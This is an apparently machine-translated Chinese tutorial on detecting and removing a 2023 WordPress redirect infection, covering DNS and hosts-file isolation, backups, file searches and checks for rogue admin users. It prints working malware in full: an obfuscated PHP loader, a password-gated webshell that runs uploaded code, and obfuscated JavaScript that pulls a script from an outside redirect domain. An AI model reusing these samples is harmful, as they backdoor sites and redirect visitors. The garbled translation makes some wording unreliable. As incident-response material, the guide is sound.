WordPress绝对是最常用的平台 CMS (Content Management System) 对于博客和在线入门商店(带有WooCommerce模块),这使其成为计算机攻击(黑客)最大的目标。最常用的黑客操作之一旨在将折衷的网站重定向到其他网页。 Redirect WordPress Hack 2023年是一种相对较新的恶意软件,会影响整个网站重定向到垃圾邮件页面,或者又可以病毒用户计算机。
内容
如果您在WordPress上开发的网站是在另一个站点上重定向的,那么受害者已经是著名的重定向黑客。
在本教程中,您将找到必要的信息和有用的提示,您可以通过这些信息来解散感染重定向的网站 WordPress Hack (Virus Redirect)。通过评论,您可以获取其他信息或寻求帮助。
检测重定向WordPress站点的病毒
站点上的流量突然和不合理的减少,减少订单数量(在线商店)或广告收据是第一个不正确的迹象。检测 “Redirect WordPress Hack 2023” (重定向病毒)可以做到,并且 “视觉的” 打开网站时,您将重定向到另一个网页。
从经验来看,大多数网络恶意软件应用程序都与Internet浏览器兼容: Chrome, Firefox, Edge, Opera。如果您是MAC计算机用户,则这些病毒在Safari浏览器中并不可见。 Safari安全系统默认地阻止了这些恶意脚本。
如果您有WordPress Hack Word Hack病毒网站,您需要做什么
我希望第一个措施不是惊慌或删除网站。甚至不应在第一阶段删除病毒或病毒文件。它们包含有价值的信息,可以帮助您了解安全漏洞的位置以及病毒的影响。作案操作。
关闭公众网站。
您如何关闭访问者的病毒网站? 最简单的是使用DNS经理并删除其IP “一个” (域名)或定义不存在的IP。因此,该网站的访问者将受到此重定向的WordPress黑客攻击,可以将它们带入病毒或垃圾邮件网页上。
如果您使用 CloudFlare drept DNS manager, te autentifici în cont și ștergi înregistrările DNS “A” 对于域名。因此,受病毒影响的区域将保留在没有IP的情况下,无法从Internet访问。
复制网站的IP并执行 “路线” 能够只访问您。从您的计算机。
您如何更改Windows计算机上网站的真实IP?
该方法通常用于通过编辑文件来阻止对某些网站的访问 “主持人”。
1。打开记事本或其他文本编辑器(带有管理员权限)并编辑文件 “hosts“。它位于:
C:\Windows\System32\drivers\etc\hosts2。在文件中 “主持人” 添加 “路线” 到您网站的真实IP。 IP从DNS Manager中删除。
IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld3。保存文件并在浏览器中访问网站。
如果网站没有打开,并且您没有在文件中犯错 “主持人”,很可能是DNS缓存。
要删除Windows操作系统上的DNS缓存,请打开命令提示符,在哪里执行订单:
ipconfig /flushdns您如何更改Mac / MacBook计算机上网站的真实IP?
对于Mac计算机用户,更改网站的真实IP要容易一些。
1。打开公用事业 Terminal。
2。执行命令行(需要执行系统密码):
sudo nano /etc/hosts3。对于Windows计算机,添加域的真实IP。
IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld4。保存更改。 Ctrl+X (y)。
完成后 “路线”,您是唯一可以访问WordPress Hack Word Hack病毒网站的人。
完整的备份网站 – 文件和数据库
即使是病毒 “重定向WordPress黑客”,建议是对整个网站进行一般备份。文件和数据库。可能您可以将两个文件的本地副本保存在 public / public_html 以及数据库。
识别病毒和重定向WordPress Hack 2023的修改文件
主要目标文件的 WordPress 我是 index.php (根深蒂固), header.php,,,, index.php 和 footer.php WordPress主题主题。手动检查这些文件并确定恶意代码或恶意软件脚本。
在2023年,一种类型的病毒 “重定向WordPress黑客” 普京 index.php 形式守则:
(我不建议您执行这些代码!)
<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20=' TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>解码,这个 脚本恶意软件 这实际上是WordPress网站的结果。不是脚本是恶意软件应用程序的基础,而是脚本可以重定向病毒网页。如果我们解码上面的脚本,我们将获得:
<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>
为了指示包含此代码的服务器上的所有文件,请访问是一件好事 SSH 到服务器上运行Linux上的支票 - UP和管理文件。
有关的: 在Google搜索的帮助下,您如何找到是否有病毒博客。 (WordPress病毒)
以下是两个命令,这些命令肯定有助于识别最近修改的文件和包含特定代码(字符串)的文件。
您如何看到在过去24小时内或Linux上其他时间范围内修改的PHP文件?
命令 “find” 它非常易于使用,并允许个性化设置时间段,即进行搜索和文件类型的补丁。
find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"在输出中,您将收到有关修改文件的日期和时间的信息,编写 /阅读 /执行许可(chmod)以及其组 /用户所属的。
如果您想几天前检查,请更改值 “-mtime -1” 或使用 “-mmin -360” 几分钟(6小时)。
您如何在php文件中寻找代码(字符串)Java?
命令行 “寻找” 通过它,您可以快速找到包含特定代码的所有PHP或Java文件如下:
find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +订单将搜索和显示文件 .php 和 .js 包含 “uJjBRODYsU“。
在上面的两个订单的帮助下,您将很容易找到最近修改了哪些文件并包含恶意软件代码。
从修改的文件中删除恶意软件,而不会损害正确的代码。在我的情况下,将恶意软件代码放置在开口之前 <head>。
在执行第一阶 “寻找” 很有可能在服务器上发现新文件,这些文件不是WordPress或放在那里。宣布WordPress黑客重定向病毒的文件。
在我研究的情况下,表单文件出现在服务器上 “wp-log-nOXdgD.php“。这些是文件 “一代” 它还包含重定向病毒使用的恶意软件代码。
<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}类型文件的目的 “wp-log-*” 它是为了传播重定向的黑客病毒和服务器上托管的其他网站。是类型的恶意软件代码 “webshell” 由一个 基本部分 (其中定义了一些加密变量)和O 执行部分 攻击者试图在系统中加载和执行恶意软件代码。
如果有变量 POST 称为 ‘bh‘ 及其加密价值 MD5 等于 “8f1f964a4b4d8d1ac3f0386693d28d03“,然后脚本似乎写了加密的内容 base64 一个称为另一个变量 ‘b3‘ 在临时文件中,然后尝试包含此临时文件。
如果有变量 POST 或 GET 称为 ‘tick脚本将以价值响应 MD5 字符串 “885“。
要识别包含此代码的服务器上的所有文件,请选择一个常见的字符串,然后执行 “find” (类似于上述)。 删除所有包含此恶意软件代码的文件。
安全漏洞由重定向WordPress Hack操作
这种重定向病毒很可能通过 WordPress管理用户剥削 或通过识别 弱势插件 允许添加具有管理员特权的用户。
对于大多数在WordPress平台上构建的网站都是可能的 编辑主题或插件的主题到管理接口(Dashboard)。因此,恶意人可以添加生成上面介绍的脚本的主题恶意软件的文件。
这样的恶意软件的一个例子是:
<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>JavaScript 打开标签后立即在WordPress主题标题中识别 <head>。
解密此JavaScript非常困难,但是很明显,另一个网址最有可能带来其他脚本来创建文件 “wp-log-*” 我在上面谈论的。
从所有文件中搜索并删除此代码 PHP 做作的。
据我弄清楚这个代码是 手动添加 由具有管理特权的新用户。
因此,为防止在仪表板中添加恶意软件,最好禁用仪表板中的WordPress /插件。
编辑文件 wp-config.php 并添加行:
define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);进行此更改后,WordPress用户无法编辑仪表板文件。
用管理员的角色检查用户
以下是您可以在WordPress平台中使用管理员搜索用户的SQL查询:
SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'此查询将返回表中的所有用户 wp_users 谁归因于管理员的角色。查询是为表完成的 wp_usermeta 在元中搜索 ‘wp_capabilities',其中包含有关用户角色的信息。
另一种方法是从: Dashboard → Users → All Users → Administrator。但是我正在练习用户,可以隐藏在仪表板面板中。因此,查看用户的最佳方法 “行政人员” WordPress是上面的SQL命令。
就我而言,我在数据库中标识了用户名称 “wp-import-user“。非常有启发性。
从这里,您可以看到创建WordPress用户的日期和时间。用户的用户也非常重要,因为他正在在服务器日志中查看。这样,您可以看到此用户的所有活动。
用管理员的角色删除用户 那你不知道,那 更改密码 给所有行政用户。编辑,作者,管理员。
将SQL用户的密码更改为数据库 a website-ului afectat.
采取这些步骤后,可以为所有用户重新启动该网站。
但是,请注意,我上面提出的是2023年与WordPress Hack重定向的网站的数千个吐痰之一。
如果您的网站已经是病毒,需要帮助或您有任何疑问,则评论框是打开的。
